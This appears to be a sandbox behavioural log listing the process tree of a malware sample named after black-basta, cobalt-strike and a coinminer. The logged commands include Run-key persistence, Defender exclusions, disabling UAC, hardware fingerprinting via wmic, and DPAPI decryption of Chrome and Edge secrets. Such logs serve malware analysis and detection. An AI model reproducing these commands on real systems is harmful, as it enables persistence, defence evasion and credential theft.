      PID:5352
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
        5⤵
        
        PID:4668
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.k1dWGdmIGI""
      4⤵
      PID:5784
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.k1dWGdmIGI"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2136
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
      4⤵
      PID:532
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6120
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:3316
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:4804
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:5484
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:2108
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
      4⤵
      PID:1052
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
      4⤵
      PID:208
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_computersystemproduct get uuid
        5⤵
        
        PID:1636
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
      4⤵
      PID:396
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic PATH Win32_VideoController GET Description,PNPDeviceID
        5⤵
        
        PID:1544
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
      4⤵
      PID:6060
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic memorychip get serialnumber
        5⤵
        
        PID:1700
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
      4⤵
      PID:544
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:3996
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
      4⤵
      PID:1184
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get processorid
        5⤵
        
        PID:3132
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
      4⤵
      PID:4296
    - - C:\Windows\system32\getmac.exe
        
        getmac /NH
        5⤵
        
        PID:3464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Update.vbs
1⤵
PID:2904
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Update.vbs"
  2⤵
  PID:452
- - C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe"
    3⤵
    PID:4348
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5648
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\ppULwUmlTm.ps1""
      4⤵
      PID:5576
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\ppULwUmlTm.ps1"
        5⤵
        
        PID:2212
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x1dxlwjv\x1dxlwjv.cmdline"
        6⤵
        
        PID:5688
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBB61.tmp" "c:\Users\Admin\AppData\Local\Temp\x1dxlwjv\CSC5C2EFAFB8F4F4BEB8C128269D496975E.TMP"
        7⤵
        
        PID:1720
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:2172
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:784
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:4752
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:2992
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:5752
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:312
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:5780
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')
        5⤵
        
        PID:3432
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:3784
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')
        5⤵
        
        PID:4976
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
      4⤵
      PID:5088
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        
        PID:3676
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:5876
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:4124
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
      4⤵
      PID:5892
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
        5⤵
        
        PID:3820
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.wGA4nicWnd""
      4⤵
      PID:5140
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.wGA4nicWnd"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4952
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
      4⤵
      PID:960
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:536
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:2008
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:4868
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:3016
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:5244
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
      4⤵
      PID:5032
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
      4⤵
      PID:1560
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_computersystemproduct get uuid
        5⤵
        
        PID:1740
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
      4⤵
      PID:2624
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic PATH Win32_VideoController GET Description,PNPDeviceID
        5⤵
        
        PID:1700
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
      4⤵
      PID:3684
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic memorychip get serialnumber
        5⤵
        
        PID:4776
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
      4⤵
      PID:5528
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:4812
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
      4⤵
      PID:2168
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get processorid
        5⤵
        
        PID:3836
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
      4⤵
      PID:2472
    - - C:\Windows\system32\getmac.exe
        
        getmac /NH
        5⤵
        
        PID:4908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Update.vbs
1⤵
PID:5444
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Update.vbs"
  2⤵
  PID:5904
- - C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe"
    3⤵
    PID:1036
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\BJoQGMTkcm.ps1""
      4⤵
      PID:4832
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\BJoQGMTkcm.ps1"
        5⤵
        
        PID:5320
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\h34f1mbh\h34f1mbh.cmdline"
        6⤵
        
        PID:5380
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC6EA.tmp" "c:\Users\Admin\AppData\Local\Temp\h34f1mbh\CSCB38CB375919942DA84D8CE2D11252B41.TMP"
        7⤵
        
        PID:4428
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:4896
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:4432
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:2780
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:3912
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:1016
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        
        PID:1856
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:1512
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')
        5⤵
        
        PID:4052
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:3452
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')
        5⤵
        
        PID:1120
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
      4⤵
      PID:3532
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        
        PID:5572
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:216
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:2340
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
      4⤵
      PID:2488
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
        5⤵
        
        PID:4876
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.4MDK2AuCd9""
      4⤵
      PID:4048
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.4MDK2AuCd9"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2100
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
      4⤵
      PID:532
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5876
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:4868
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:3088
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:5412
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:1056
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
      4⤵
      PID:1636
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
      4⤵
      PID:1168
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_computersystemproduct get uuid
        5⤵
        
        PID:400
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
      4⤵
      PID:736
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic PATH Win32_VideoController GET Description,PNPDeviceID
        5⤵
        
        PID:1836
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
      4⤵
      PID:4280
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic memorychip get serialnumber
        5⤵
        
        PID:4924
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
      4⤵
      PID:6040
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:4880
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
      4⤵
      PID:1192
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get processorid
        5⤵
        
        PID:5568
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
      4⤵
      PID:5496
    - - C:\Windows\system32\getmac.exe
        
        getmac /NH
        5⤵
        
        PID:3488
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "pip install pyperclip"
      4⤵
      PID:3044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Update.vbs
1⤵
PID:3080
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Update.vbs"
  2⤵
  PID:5132
- - C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe"
    3⤵
    PID:4540
